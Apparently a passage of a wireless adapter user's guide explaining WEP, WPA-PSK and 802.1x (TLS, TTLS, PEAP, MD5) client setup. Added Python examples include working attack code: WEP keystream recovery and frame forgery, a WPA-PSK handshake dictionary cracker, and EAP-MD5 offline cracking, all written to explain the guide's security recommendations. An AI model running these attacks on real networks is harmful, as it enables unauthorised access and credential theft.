Setting up Connection Security: Intel(R) PRO/Wireless LAN Mini PCI Adapter User's Guide


Security and Encryption

Setting up Data Encryption and Authentication
Encryption Overview
How to Enable WEP Encryption
System Administrator Tasks
Setting up the Client for WEP and MD5 authentication
Setting up the Client for WPA-PSK with WEP or TKIP encryption
Setting up the Client for WPA using WEP or TKIP encryption and TLS authentication
Setting up the Client for WPA using WEP or TKIP encryption and TTLS or PEAP authentication
Setting up the Client for CCX using CKIP encryption and LEAP authentication


Setting up Data Encryption and Authentication

Wired Equivalent Privacy (WEP) encryption and shared authentication help protect your data on the network. WEP uses an encryption key to encrypt data before transmitting it. Only computers using the same encryption key can access the network or decrypt the encrypted data transmitted by other computers. Authentication provides an additional validation process from the adapter to the access point. The WEP encryption algorithm is vulnerable to passive and active network attacks: its keys are short and static, and the per-packet initialization vector is reused often enough that an eavesdropper can recover keystream and, with enough captured traffic, the key itself. TKIP and CKIP are enhancements layered on WEP that mitigate these attacks and address its shortcomings; prefer them, or WPA, wherever the access point supports them.

Open and Shared Key authentication

802.11 supports two network authentication methods, Open System and Shared Key, and either can be combined with 64-bit or 128-bit WEP encryption. Open System performs no cryptographic check to associate with an access point; the WEP key is needed only to exchange data afterwards. Shared Key authentication has the access point send a plaintext challenge that the station returns WEP-encrypted, which hands an eavesdropper a plaintext/ciphertext pair under the network key, so Open System with WEP is the recommended choice and is what the procedures below use. Supported authentication schemes are Open and Shared authentication.

Network Keys

When Data Encryption (WEP, CKIP or TKIP) is enabled, a network key is used for encryption. A network key can be provided for you automatically (for example, it might be provided on your wireless network adapter), or you can enter it yourself and specify the key length (64-bit or 128-bit), key format (ASCII characters or hexadecimal digits), and key index (the location where a specific key is stored). The longer the key length, the more secure the key: every time the length of a key is increased by one bit, the number of possible keys doubles. Note that the nominal WEP key length includes the 24-bit initialization vector that is transmitted in the clear with every frame, so a 64-bit key has 40 secret bits and a 128-bit key has 104.

Under 802.11, a wireless station can be configured with up to four keys (the key index values are 1, 2, 3, and 4). When an access point or a wireless station transmits an encrypted message using a key stored at a specific key index, the transmitted message carries the key index that was used to encrypt the message body. The receiving access point or wireless station retrieves the key stored at that key index and uses it to decrypt the message body. The index travels in the clear and is only a selector; it adds no secrecy of its own.

Encryption Static and Dynamic Key Types

802.1x profiles can use two types of encryption keys, static and dynamic. Static encryption keys are changed manually, so the same key is reused by every station for a long time and is more vulnerable. MD5 authentication only uses static encryption keys, because EAP-MD5 does not derive any keying material. Dynamic encryption keys are generated per session and renewed automatically on a periodic basis, which makes the encryption key(s) more secure. To enable dynamic encryption keys, you must use an 802.1x authentication method that derives keys, such as TLS, TTLS, PEAP or LEAP.

802.1x Authentication key points

802.1x authentication methods include passwords, certificates, and smart cards (plastic cards that hold data). 802.1x password synchronization: the "Use Windows login" option on the MD5, TLS, TTLS, and LEAP Credentials dialogs makes the 802.1x credentials match your Windows user name and password. The 802.1x authentication option can only be used with Infrastructure operation mode.


Encryption Overview

Security in the WLAN can be supplemented by enabling data encryption using WEP (Wired Equivalent Privacy). You can choose 64-bit or 128-bit encryption. The data is then encrypted with a key. Another parameter, the key index, lets you store multiple keys for the profile; however, only one key can be used at a time. You can also choose to password protect the profile to ensure privacy.

The pass phrase is used to generate a WEP key automatically. You have the option of either using a pass phrase or entering a WEP key manually. With 64-bit encryption, the pass phrase is 5 characters long and can be any arbitrary, easy-to-remember string such as Acme1; alternatively, enter the 10 hexadecimal digits of the WEP key used by the network you connect to. With 128-bit encryption, the pass phrase is 13 characters long, or you can enter the 26 hexadecimal digits of the WEP key. Either way the key is only as strong as the string you type: a dictionary word of 5 or 13 characters is far easier to guess than random hexadecimal digits.

Note: You must use the same encryption type, key index number, and WEP key as other devices on your wireless network.
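The key handling described under Network Keys and Encryption Overview, as an added example written for this page (it is not Intel(R) PROSet code): it normalizes a dialog entry into key bytes, builds and decrypts WEP frame bodies that carry the key index, and shows the passive attack on Shared Key authentication that makes Open the recommended mode. Assumptions: a 5- or 13-character pass phrase is used verbatim as the 40- or 104-bit key (if your network derives keys from a pass phrase differently, enter the hex key instead), and the keys, frames and challenge are constructed for the demonstration.

```python
import os
import zlib
from typing import Dict, Optional, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4, the stream cipher inside WEP: key scheduling, then XOR data with keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def normalize_wep_key(entry: str) -> bytes:
    """Turn a dialog entry into key bytes. Assumption for this example: a 5- or
    13-character pass phrase is used verbatim as the 40- or 104-bit key; 10 or 26
    hex digits are decoded. Other lengths are rejected rather than padded."""
    if len(entry) in (5, 13):
        return entry.encode("ascii")
    if len(entry) in (10, 26):
        return bytes.fromhex(entry)      # raises ValueError on non-hex input
    raise ValueError("WEP key must be 5/13 ASCII characters or 10/26 hex digits")


def _icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(keys: Dict[int, bytes], key_index: int, plaintext: bytes,
                iv: Optional[bytes] = None) -> bytes:
    """Frame body = IV(3) | KeyID byte | RC4(IV || key, plaintext || ICV).
    key_index is the dialog's 1..4; on the air it is 0..3 in the top two bits of
    the fourth byte, which is how the receiver knows which stored key to use."""
    if key_index not in keys:
        raise KeyError(f"no key stored at index {key_index}")
    iv = os.urandom(3) if iv is None else iv
    header = iv + bytes([(key_index - 1) << 6])
    return header + rc4(iv + keys[key_index], plaintext + _icv(plaintext))


def wep_decrypt(keys: Dict[int, bytes], frame: bytes) -> bytes:
    """Read the key index from the header, decrypt with that key, verify the ICV."""
    iv, key_index = frame[:3], (frame[3] >> 6) + 1
    if key_index not in keys:
        raise KeyError(f"no key stored at index {key_index}")
    data = rc4(iv + keys[key_index], frame[4:])
    plaintext, icv = data[:-4], data[-4:]
    if _icv(plaintext) != icv:
        raise ValueError("ICV mismatch: wrong key, wrong index or corrupted frame")
    return plaintext


def keystream_from_shared_key_auth(challenge: bytes, response: bytes) -> Tuple[bytes, bytes]:
    """Passive attack on Shared Key authentication: the AP sends a 128-byte
    challenge in clear and the station returns it WEP-encrypted. XOR of the two
    yields the RC4 keystream for that IV and key, with no key knowledge needed."""
    known = challenge + _icv(challenge)
    keystream = bytes(c ^ p for c, p in zip(response[4:], known))
    return response[:4], keystream          # header (IV + KeyID byte) and keystream


def forge_with_keystream(header: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Build a frame the AP will accept, reusing the recovered IV and keystream."""
    data = plaintext + _icv(plaintext)
    if len(data) > len(keystream):
        raise ValueError("not enough keystream recovered for this payload")
    return header + bytes(d ^ k for d, k in zip(data, keystream))


if __name__ == "__main__":
    # Constructed keys: index 1 as a pass phrase, index 2 as hex digits (both 64-bit).
    keys = {1: normalize_wep_key("Acme1"), 2: normalize_wep_key("41636d6532")}
    frame = wep_encrypt(keys, 2, b"payload for index 2")
    print(wep_decrypt(keys, frame))                       # b'payload for index 2'
    challenge = os.urandom(128)                          # what the AP sends in clear
    header, ks = keystream_from_shared_key_auth(challenge, wep_encrypt(keys, 1, challenge))
    print(wep_decrypt(keys, forge_with_keystream(header, ks, b"forged without the key")))
```

The last two lines are the reason Open is recommended over Shared: one observed challenge/response gives an attacker 132 bytes of keystream for that IV, enough to inject frames or decrypt any later frame that reuses the IV, without ever learning the key.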


How to Enable WEP Encryption

The following example describes how to edit an existing profile and apply WEP encryption.

Note: Before you begin, contact your system administrator for the network WEP pass phrase or hex key.

To enable WEP encryption:

  1. From the General page, click the Networks tab.
  2. Select the profile from the Profile List and click the Edit button.
  3. Click the Security tab.
  4. Select any Network Authentication mode (Open is recommended).
  5. Select WEP Data Encryption.
  6. Select Set Manual Key.
  7. Select a key index number 1, 2, 3, or 4 (Default is 1)
  8. Select 64-bit or 128-bit Encryption Level.
  9. Select either Use pass phrase or Use hex key and enter the pass phrase or hex key in the text box.
  10. Click OK to save the profile settings.

System Administrator Tasks

Note: The following information is intended for system administrators. Refer to Administrator Privileges and Restricted Users for more information.

How to Obtain a Client Certificate

If you do not have a certificate for EAP-TLS or EAP-TTLS, you must obtain a client certificate to allow authentication. Typically you need to consult your network administrator for instructions on how to obtain a certificate on your network. Certificates can be managed from "Internet Settings", accessed from either Internet Explorer or the Windows Control Panel applet; use the "Content" page of "Internet Settings".

Windows XP and 2000: When obtaining a client certificate, do not enable strong private key protection. If you enable strong private key protection for a certificate, you will need to enter an access password for the certificate each time it is used. You must disable strong private key protection for the certificate if you are configuring the service for TLS/TTLS authentication; otherwise the 802.1x service will fail authentication because there is no logged-in user to whom it can display the prompt dialog. The trade-off is that any program running under that user account can then use the key without a prompt, so keep the account itself well protected.

Notes about Smart Cards

After installing a smart card, its certificate is automatically installed on your computer and can be selected from the personal certificate store and root certificate store.

Setting up the Client for TLS authentication

Step 1: Getting a certificate

To allow TLS authentication, you need a valid client (user) certificate in the local repository for the logged-in user's account. You also need a trusted CA certificate in the root store.

The following information provides two methods for getting a certificate:

Getting a certificate from a Windows 2000 CA:

  1. Start Internet Explorer and browse to the Certificate Authority HTTP service (use a URL such as http://yourdomainserver.yourdomain/certsrv, where certsrv is the path that brings you to the certificate authority; you can also use the IP address of the server, such as 192.0.2.12/certsrv).
  2. Log on to the CA with the name and password of the user account created for you on the authentication server. The name and password do not have to be the same as the Windows logon name and password of your current user.
  3. On the Welcome page of the CA, select the Request a certificate task and submit the form.
  4. On the Choose Request Type page, select Advanced request, then click Next.
  5. On the Advanced Certificate Requests page, select Submit a certificate request to this CA using a form, then click Submit.
  6. On the Advanced Certificate Request page, choose the User certificate template. Select "Mark keys as exportable" and click Next, using the provided defaults. (An exportable private key can be copied off the machine by anyone who can log on as that user, so only keep it exportable if you need to back up or move the certificate later.)
  7. On the Certificate Issued page, select Install this certificate.

Note: If this is the first certificate you have obtained, the CA will first ask whether it should install a trusted CA certificate in the root store. The dialog will not say this is a trusted CA certificate, but the name on the certificate shown will be that of the host of the CA. Click Yes only if that name is the CA your administrator told you to expect, because whatever you install here is trusted for server validation from then on. You need this certificate for both TLS and TTLS.

  8. If your certificate was successfully installed, you will see the message, "Your new certificate has been successfully installed."
  9. To verify the installation, click Internet Explorer > Tools > Internet Options > Content > Certificates. The new certificate should be installed in the "Personal" folder.

Importing a certificate from a file

  1. Open Internet Properties (right-click the Internet Explorer icon on the desktop and select Properties).
  2. Click the Certificates button on the Content page. This opens the list of installed certificates.
  3. Click the Import button under the list of certificates. This starts the Certificate Import Wizard. (Note: Steps 1 through 3 may also be accomplished by double-clicking the icon for the certificate file.)
  4. Select the file and proceed to the Password page.
  5. On the Password page, specify the access password for the file and clear the Enable strong private key protection option.
  6. On the Certificate Store page, select "Automatically select the certificate store based on the type of certificate". The certificate must be in the user account's Personal store to be accessible in the Configure dialog of the client; this is where it goes when "automatic" is selected.
  7. Proceed to "Completing the Certificate Import" and click the Finish button.

The following steps configure a profile that uses WPA network authentication with WEP or TKIP encryption and TLS authentication.

Step 2: Specifying the certificate used by Intel(R) PROSet

Note: Obtain and install a client certificate first; refer to Step 1 or consult your system administrator.
  1. From the General page, click the Networks tab.
  2. Click the Add button.
  3. Enter the profile and network (SSID) name.
  4. Select Infrastructure for the operating mode.
  5. Click Next.
  6. Select WPA for the Network Authentication.
  7. Select WEP or TKIP as the Data Encryption.
  8. Click the 802.1x Enabled check box.
  9. Set the authentication type to TLS to be used with this connection.
  10. Click the Configure button to open the settings dialog.
  11. Enter your user name in the User Name field.
  12. Select the "Certificate Issuer" from the list. Any Trusted CA is the default; it accepts a server certificate issued by any CA in the root store, so select your organization's CA explicitly where you can.
  13. Enter the Server/Certificate name. If you know the server/certificate name, enter it and select the appropriate option to match the server name exactly or to specify the domain name. This check is what ties the connection to your RADIUS server rather than to any server holding a certificate from the chosen CA.

  14. Client Certificate: This option selects a client certificate from the Personal certificate store of the Windows logged-in user. This certificate is used for client authentication. Click the Select button to open a list of installed certificates.

Note about Certificates: The specified identity should match the field "Issued to" in the certificate and should be registered on the authentication server (i.e. the RADIUS server) used by the authenticator. Your certificate must be "valid" with respect to the authentication server. This requirement depends on the authentication server and generally means that the authentication server must know the issuer of your certificate as a Certificate Authority. You should be logged in using the same user name you used when the certificate was installed.

  15. Select the certificate from the list and click OK. The client certificate information displays under "Client Certificate".
  16. Click Close.
  17. Click Next.
  18. Click the Finish button to save the profile settings.

Setting up the Client for WEP and MD5 authentication 

To add WEP and MD5 authentication to a new profile, follow the steps below. MD5 authentication checks the password with a challenge/response that is not protected by a TLS tunnel and does not derive any keying material, so the WEP key stays static and a captured exchange can be attacked offline by password guessing; use it only where the RADIUS server offers nothing stronger.

Note: Before you begin, contact your system administrator for the username and password on the RADIUS server.

  1. From the General page, click the Networks tab.
  2. Click the Add button from the Profile List.
  3. Enter the profile and network (SSID) name.
  4. Select Infrastructure for the operating mode.
  5. Click Next.
  6. Select Open (recommended) Network Authentication.
  7. Select WEP Data Encryption.
  8. Select the key index 1, 2, 3 or 4. (Default key is 1)
  9. Select either 64 or 128-bit for the Encryption Level.
  10. Select either Use pass phrase or Use hex key and enter the Pass phrase or key in the text box.
  11. Click the 802.1x Enabled check box.
  12. Select MD5 as the 802.1x Authentication Type.
  13. Select one of the following options: Use Windows Logon (the 802.1x credentials follow your Windows user name and password), or enter the user name and password of your account on the RADIUS server.
Note: If the 'Use Windows Logon' feature is grayed-out (not accessible), the Single Sign On feature has not been installed. To install it, refer to Installing or Uninstalling the Single Sign On Feature.
  14. Click Close to save the settings.
  15. Click Next.
  16. Common Profiles and Persistent Connect: If required, to enable the Common profile feature select This profile can be used by all users (Common). To enable the Persistent Connect feature select This profile will be used when no user is logged on (Persistent). These features are installed during the software installation process. If these features are selected you must also enable Switch to common and persistent profile management in the Advanced Settings.
  17. Click Finish to save the profile settings.
  18. Select the new profile at the bottom of the Profiles List. Use the up and down arrows to position the priority of the new profile in the priority list.
  19. Click Connect to connect to the selected wireless network.
  20. Click OK to close Intel(R) PROSet.

Setting up the Client for WPA-PSK with WEP or TKIP encryption

Use Wi-Fi Protected Access Pre-Shared Key (WPA-PSK) mode if no authentication server is being used. This mode does not use any 802.1x authentication protocol. It can be used with WEP or TKIP data encryption. WPA-PSK requires configuration of a pre-shared key (PSK): enter either a pass phrase or the 64 hexadecimal digits of the 256-bit pre-shared key. The data encryption key is derived from the PSK. Because the same PSK is shared by every station and everything else that goes into the per-session keys is visible on the air, anyone who captures a station's association can test pass phrase guesses offline; choose a long, random pass phrase rather than a word, and change it when a member of the network leaves.
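The PSK derivation referred to above, as an added example written for this page (it is not Intel(R) PROSet code): it turns a pass phrase or 64 hex digits into the 256-bit PSK, derives the per-session keys from it the way the 4-way handshake does, and runs the offline pass phrase guess that a captured handshake permits. The derivations follow IEEE 802.11i; the MAC addresses, nonces, handshake frame and word list are constructed for the demonstration.

```python
import hashlib
import hmac
from typing import Iterable, Optional

_HEX = set("0123456789abcdefABCDEF")


def wpa_psk(entry: str, ssid: str) -> bytes:
    """The 256-bit pre-shared key the dialog stores. A 64-hex-digit entry is the PSK
    itself; a pass phrase (8 to 63 characters) is expanded with
    PBKDF2-HMAC-SHA1(pass phrase, SSID, 4096 iterations, 32 bytes) as in IEEE 802.11i."""
    if len(entry) == 64 and set(entry) <= _HEX:
        return bytes.fromhex(entry)
    if not 8 <= len(entry) <= 63:
        raise ValueError("WPA pass phrase must be 8 to 63 characters or 64 hex digits")
    return hashlib.pbkdf2_hmac("sha1", entry.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range((nbytes + 19) // 20)
    )
    return out[:nbytes]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key from the 4-way handshake. With WPA-PSK the PMK is the
    PSK, so the only per-session inputs are the two MAC addresses and two nonces.
    The 64-byte TKIP PTK is KCK(16) | KEK(16) | TK(16) | Michael MIC keys(16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_key_mic(kck: bytes, frame: bytes) -> bytes:
    """EAPOL-Key MIC for key descriptor version 1 (TKIP): HMAC-MD5 over the frame
    with the MIC field (bytes 81..96) zeroed."""
    zeroed = frame[:81] + bytes(16) + frame[97:]
    return hmac.new(kck, zeroed, hashlib.md5).digest()


def make_handshake_msg2(kck: bytes, snonce: bytes) -> bytes:
    """Constructed message 2 of the 4-way handshake (station -> AP) for the demo:
    802.1X header, WPA key descriptor, SNonce, and a MIC computed with the KCK."""
    frame = bytes([0x01, 0x03]) + (95).to_bytes(2, "big")          # version, EAPOL-Key, body length
    frame += bytes([0xFE]) + (0x0109).to_bytes(2, "big")            # WPA descriptor; key info: v1, pairwise, MIC
    frame += (32).to_bytes(2, "big") + (1).to_bytes(8, "big")       # key length, replay counter
    frame += snonce + bytes(16) + bytes(8) + bytes(8)              # SNonce, key IV, RSC, key ID
    frame += bytes(16) + (0).to_bytes(2, "big")                     # MIC placeholder, key data length
    return frame[:81] + eapol_key_mic(kck, frame) + frame[97:]


def guess_passphrase(ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
                     msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on a captured handshake: derive PSK -> PTK -> KCK for
    each candidate and compare the MIC. Everything needed is visible on the air, so
    WPA-PSK is exactly as strong as the pass phrase."""
    mic = msg2[81:97]
    for candidate in wordlist:
        try:
            kck = wpa_ptk(wpa_psk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        except ValueError:
            continue                                   # candidate outside 8..63 characters
        if hmac.compare_digest(eapol_key_mic(kck, msg2), mic):
            return candidate
    return None


if __name__ == "__main__":
    print(wpa_psk("password", "IEEE").hex())   # IEEE 802.11i Annex H test vector
    # Constructed addresses and nonces standing in for a captured handshake.
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = wpa_ptk(wpa_psk("password", "IEEE"), aa, spa, anonce, snonce)[:16]
    msg2 = make_handshake_msg2(kck, snonce)
    print(guess_passphrase("IEEE", aa, spa, anonce, snonce, msg2, ["letmein", "password", "hunter2"]))
```

The 4096 PBKDF2 iterations slow each guess a little, but not enough to save a short or dictionary pass phrase; the pass phrase length and randomness are the only controls the network operator has.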

To configure a new profile using WEP or TKIP encryption with WPA-PSK network authentication:

  1. From the General page, click the Networks tab.
  2. Click the Add button.
  3. Enter the profile and network (SSID) name.
  4. Select Infrastructure for the operating mode.
  5. Click Next.
  6. Select WPA-PSK for the Network Authentication.
  7. Select WEP or TKIP as the Data Encryption.
  8. Select either Use pass phrase or Use hex key and enter the pass phrase or the 64 hexadecimal digits of the pre-shared key in the text box.
  9. Click Next.
  10. Click Finish to save the profile settings.
  11. Select the new profile at the bottom of the Profiles List. Use the up and down arrows to position the priority of new profile in the priority list.
  12. Click Connect to connect to the selected wireless network.
  13. Click OK to close the Intel(R) PROSet.

Setting up the Client for WPA using WEP or TKIP encryption and TLS authentication

Wi-Fi Protected Access (WPA) mode can be used with TLS, TTLS, or PEAP 802.1x authentication and with WEP or TKIP data encryption. WPA binds to 802.1x authentication: the data encryption key is derived from keying material produced by the 802.1x exchange, so each session gets its own key. To improve data encryption, WPA uses the Temporal Key Integrity Protocol (TKIP), which adds per-packet key mixing, a message integrity check and a re-keying method on top of the WEP cipher.

  1. Obtain and install a client certificate, refer to Setting up the Client for TLS authentication or consult your system administrator.
  2. From the General page, click the Networks tab.
  3. Click the Add button.
  4. Enter the profile and network (SSID) name.
  5. Select Infrastructure for the operating mode.
  6. Click Next.
  7. Select WPA Network Authentication.
  8. Select WEP or TKIP Data Encryption.
  9. Set the authentication type to TLS to be used with this connection.
  10. Click the Configure button to open the settings dialog.
  11. Enter your user name in the User Name field.

  12. Select the "Certificate Issuer" from the list. Any Trusted CA is the default; it accepts a server certificate issued by any CA in the root store, so select your organization's CA explicitly where you can.

  13. Click the "allow intermediate certificates" check box to allow a number of unspecified certificates to be in the server certificate chain between the server certificate and the specified CA. If unchecked, then the specified CA must have directly issued the server certificate.

  14. Enter the Server name. If you know the server name enter this name. Select the appropriate option to match the server name exactly or specify the domain name.

  15. Under the "Client certificate" option click the Select button.

Note about Certificates: The specified identity should match the field "Issued to" in the certificate and should be registered on the authentication server (i.e. RADIUS server) that is used by the authenticator. Your certificate must be "valid" with respect to the authentication server. This requirement depends on the authentication server and generally means that the authentication server must know the issuer of your certificate as a Certificate Authority. You should be logged in using the same username you used when the certificate was installed.

  16. Select the certificate from the list and click OK. The client certificate information displays under "Client Certificate".
  17. Click Close.
  18. Click Next.
  19. Click Finish to save the profile settings.
  20. Select the new profile at the bottom of the Profiles List. Use the up and down arrows to position the priority of the new profile in the priority list.
  21. Click Connect to connect to the selected wireless network.
  22. Click OK to close Intel(R) PROSet.

Setting up the Client for WPA using WEP or TKIP encryption and TTLS or PEAP authentication

TTLS authentication: These settings define the protocol and the credentials used to authenticate a user. In TTLS, the client uses EAP-TLS to validate the server and create a TLS-encrypted channel between the client and server. The client then uses another authentication protocol, typically a password-based protocol such as MD5 Challenge, over this encrypted channel to authenticate the user. The challenge and response packets are sent inside the TLS channel and are not exposed on the air.

PEAP authentication: PEAP settings are required for the authentication of the client to the authentication server. In PEAP, the client uses EAP-TLS to validate the server and create a TLS-encrypted channel between client and server. The client then uses another EAP mechanism, such as Microsoft Challenge Handshake Authentication Protocol (MS-CHAP) Version 2, over this encrypted channel to authenticate the user. The challenge and response packets are sent inside the TLS channel and are not exposed on the air. In both methods this protection depends on the client actually validating the server certificate, which is why the Certificate Issuer and Server name settings in the procedure below matter.
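An added example, written for this page rather than taken from Intel(R) PROSet, of what the two descriptions above and the earlier WEP and MD5 profile actually put on the air: it builds and parses EAP packets, reproduces a plain EAP-MD5 exchange and cracks it offline, and contrasts the outer identity a listener sees when a TTLS or PEAP session starts with "anonymous" versus the real user name. The user name, password, challenge and word list are constructed for the demonstration.

```python
import hashlib
from typing import List, Optional, Tuple

EAP_REQUEST, EAP_RESPONSE = 1, 2
TYPE_IDENTITY, TYPE_MD5_CHALLENGE, TYPE_TTLS, TYPE_PEAP = 1, 4, 21, 25


def eap_packet(code: int, ident: int, eap_type: int, type_data: bytes = b"") -> bytes:
    """RFC 3748 packet: Code(1) | Identifier(1) | Length(2) | Type(1) | Type-Data."""
    return bytes([code, ident]) + (5 + len(type_data)).to_bytes(2, "big") + bytes([eap_type]) + type_data


def parse_eap(packet: bytes) -> Tuple[int, int, int, bytes]:
    length = int.from_bytes(packet[2:4], "big")
    if length < 5 or length != len(packet):
        raise ValueError("bad EAP length field")
    return packet[0], packet[1], packet[4], packet[5:]


def md5_challenge_response(ident: int, password: bytes, challenge: bytes, name: bytes) -> bytes:
    """EAP-MD5 response Type-Data: Value-Size(1) | MD5(Identifier || password || challenge) | Name."""
    value = hashlib.md5(bytes([ident]) + password + challenge).digest()
    return bytes([len(value)]) + value + name


def md5_exchange(ident: int, username: str, password: str, challenge: bytes) -> List[bytes]:
    """The WEP + MD5 profile on the air: identity, challenge and response all in clear."""
    return [
        eap_packet(EAP_REQUEST, ident, TYPE_IDENTITY),
        eap_packet(EAP_RESPONSE, ident, TYPE_IDENTITY, username.encode()),
        eap_packet(EAP_REQUEST, ident + 1, TYPE_MD5_CHALLENGE, bytes([len(challenge)]) + challenge),
        eap_packet(EAP_RESPONSE, ident + 1, TYPE_MD5_CHALLENGE,
                   md5_challenge_response(ident + 1, password.encode(), challenge, username.encode())),
    ]


def tunneled_start(ident: int, username: str, use_real_username_as_identity: bool,
                   eap_type: int = TYPE_PEAP) -> List[bytes]:
    """Start of a TTLS or PEAP session. Only the outer identity is exposed; the
    password protocol runs inside the TLS tunnel that follows the Start packet.
    The flag mirrors the 'Use credentials username as EAP identity' check box."""
    outer = username if use_real_username_as_identity else "anonymous"
    return [
        eap_packet(EAP_REQUEST, ident, TYPE_IDENTITY),
        eap_packet(EAP_RESPONSE, ident, TYPE_IDENTITY, outer.encode()),
        eap_packet(EAP_REQUEST, ident + 1, eap_type, bytes([0x20])),   # Flags byte with the S (Start) bit
    ]


def identities_on_the_air(packets: List[bytes]) -> List[str]:
    """What a passive listener learns: every EAP-Response/Identity travels in clear."""
    found = []
    for p in packets:
        code, _, eap_type, data = parse_eap(p)
        if code == EAP_RESPONSE and eap_type == TYPE_IDENTITY:
            found.append(data.decode())
    return found


def crack_md5_challenge(packets: List[bytes], wordlist: List[str]) -> Optional[str]:
    """Offline guess against a captured EAP-MD5 exchange: pair the challenge with
    the response that answers it and recompute the hash for each candidate."""
    challenge = response = None
    for p in packets:
        code, ident, eap_type, data = parse_eap(p)
        if eap_type == TYPE_MD5_CHALLENGE and code == EAP_REQUEST:
            challenge = (ident, data[1:1 + data[0]])
        elif eap_type == TYPE_MD5_CHALLENGE and code == EAP_RESPONSE and challenge and ident == challenge[0]:
            response = data[1:1 + data[0]]
    if challenge is None or response is None:
        return None
    ident, chal = challenge
    for cand in wordlist:
        if hashlib.md5(bytes([ident]) + cand.encode() + chal).digest() == response:
            return cand
    return None


if __name__ == "__main__":
    # Constructed exchange with a constructed challenge; nothing here came off a real network.
    captured = md5_exchange(7, "jdoe", "Winter2004", bytes(range(16)))
    print(identities_on_the_air(captured))                            # ['jdoe']
    print(crack_md5_challenge(captured, ["letmein", "Winter2004"]))   # Winter2004
    print(identities_on_the_air(tunneled_start(9, "jdoe", False)))    # ['anonymous']
```

The same MD5 Challenge that is trivially guessable in the plain exchange becomes safe to use as the inner protocol of TTLS, because the listener never sees the challenge or the response once the TLS channel is up; only the outer identity remains visible, and the check box decides whether that is "anonymous" or the real name.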

The following example describes how to use WPA with WEP or TKIP encryption using TTLS or PEAP authentication.

  1. Obtain and install a client certificate, refer to Setting up the Client for TLS authentication or consult your system administrator.
  2. From the General page, click the Networks tab.
  3. Click the Add button.
  4. Enter the profile and network (SSID) name.
  5. Select Infrastructure for the operating mode.
  6. Click Next.
  7. Select WPA for the Network Authentication.
  8. Select WEP or TKIP as the Data Encryption.
  9. Select 802.1x Enabled.
  10. Set the authentication type to TTLS or PEAP to be used with this connection.
  11. Click the Configure button to open the settings dialog.
  12. Use credentials username as EAP identity: If the check box is cleared, the predefined string "anonymous" is sent as the outer EAP identity and your real user name travels only inside the TLS tunnel. If the check box is selected, the real user name is sent in the clear as the outer identity, which is less private; select it only where the authentication server requires it, for example a Microsoft IAS RADIUS server configured to accept only valid user names in the outer identity.
  13. Select the Certificate Issuer from the list. Select Any Trusted CA as the default. Click the allow intermediate certificates check box to allow a number of unspecified certificates to be in the server certificate chain between the server certificate and the specified CA. If unchecked, then the specified CA must have directly issued the server certificate.
  14. Enter the Server name.

  15. Authentication Protocol: select the inner protocol your server expects (for example, MD5 Challenge for TTLS or MS-CHAP Version 2 for PEAP).
  16. Select one of the following options: Use Windows Logon, or enter the user name and password for your account.
Note: If the 'Use Windows Logon' feature is grayed-out (not accessible), the Single Sign On feature has not been installed. To install it, refer to Installing or Uninstalling the Single Sign On Feature.
  17. Use Client Certificate: This option selects a client certificate from the Personal certificate store of the Windows logged-in user. This certificate is used for client authentication. Click the Select button to open a list of installed certificates.

Note about Certificates: The specified identity should match the field "Issued to" in the certificate and should be registered on the authentication server (i.e., the RADIUS server) used by the authenticator. Your certificate must be "valid" with respect to the authentication server. This requirement depends on the authentication server and generally means that the authentication server must know the issuer of your certificate as a Certificate Authority. You should be logged in using the same user name you used when the certificate was installed.

  18. Select the certificate from the list and click OK. The client certificate information displays under "Client Certificate".
  19. Click Close.
  20. Click Next.
  21. Click Finish to save the profile settings.
  22. Select the new profile at the bottom of the Profiles List. Use the up and down arrows to position the priority of the new profile in the priority list.
  23. Click Connect to connect to the selected wireless network.
  24. Click OK to close Intel(R) PROSet.
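The server validation settings used in the TLS and the TTLS/PEAP procedures (Certificate Issuer, allow intermediate certificates, Server name with exact or domain match), as an added example of the decision they encode. This is illustrative code written for this page, not the Intel(R) PROSet supplicant; the certificate chains, CA names and root store are constructed, and names stand in for full X.509 chain validation (signatures, validity dates, revocation), which a real supplicant performs in addition.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Cert:
    subject: str   # name the certificate is issued to (the server name for the leaf)
    issuer: str    # name of the CA that issued it


# Constructed root store for the example: what "Any Trusted CA" would accept.
TRUSTED_ROOTS = {"Corp Root CA", "Some Public CA"}


def issuer_policy_ok(chain: List[Cert], certificate_issuer: Optional[str],
                     allow_intermediates: bool) -> bool:
    """The Certificate Issuer / allow intermediate certificates settings.
    chain[0] is the server certificate; each following entry issued the one before
    it. certificate_issuer=None stands for 'Any Trusted CA'."""
    if not chain or chain[-1].issuer not in TRUSTED_ROOTS:
        return False
    if any(lower.issuer != upper.subject for lower, upper in zip(chain, chain[1:])):
        return False                                  # broken link in the chain
    if certificate_issuer is None:
        return True
    if not allow_intermediates:
        return chain[0].issuer == certificate_issuer  # CA must have issued the leaf directly
    return certificate_issuer in {c.issuer for c in chain}


def server_name_ok(cert_name: str, server_name: str, match_exactly: bool) -> bool:
    """'Match server name exactly' vs 'specify the domain name' (suffix on a label
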